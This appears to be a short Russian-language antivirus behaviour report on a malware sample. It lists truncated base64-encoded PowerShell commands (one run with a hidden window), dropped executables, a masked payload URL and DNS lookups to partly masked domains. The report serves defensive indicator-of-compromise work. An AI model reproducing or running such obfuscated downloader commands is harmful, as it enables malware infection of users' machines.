Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQATABFADUAYgAwAG8AIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AewA0AH0AIgAtAEYAIAAnAE0ALgAnACwAJwB5AHMAVAAnACwAJwBpAG8ALgBkAGkAUgBlAEMAVA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\1072428.cvr
- %HOMEPATH%\gzcs8b5\eempwrr\j3pw9s.exe
- http://tu###hoi.com/wp-content/CI2oG/
- DNS ASK tu###hoi.com
- DNS ASK mi###system.fr
- DNS ASK na##ast.com
- DNS ASK bl##.#myrnaweb.com
- DNS ASK mh###rdware.com
- DNS ASK os##meda.lt
- DNS ASK bl##.#echforing.com
- DNS ASK te###slack.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQATABFADUAYgAwAG8AIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AewA0AH0AIgAtAEYAIAAnAE0ALgAnACwAJwB5AHMAVAAnACwAJwBpAG8ALgBkAGkAUgBlAEMAVA...' (со скрытым окном)